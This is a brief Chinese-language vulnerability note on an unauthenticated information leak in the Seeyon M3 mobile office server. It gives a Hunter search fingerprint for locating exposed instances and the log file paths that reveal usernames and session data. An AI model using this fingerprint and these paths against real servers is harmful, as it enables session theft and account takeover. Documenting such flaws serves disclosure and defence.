Z5-1致远互联-M3移动智能办公平台-InformationLeakage
漏洞描述:
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。 在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
网站图片:
网络测绘:
Hunter 语法:
hunterweb.icon==“657d4895205951cbea6396701b194c30”
漏洞复现:
payload:
/mobile_portal/logs/autoLogin.log
效果图:
/mobile_portal/logs/app.log
/mobile_portal/logs/requset.log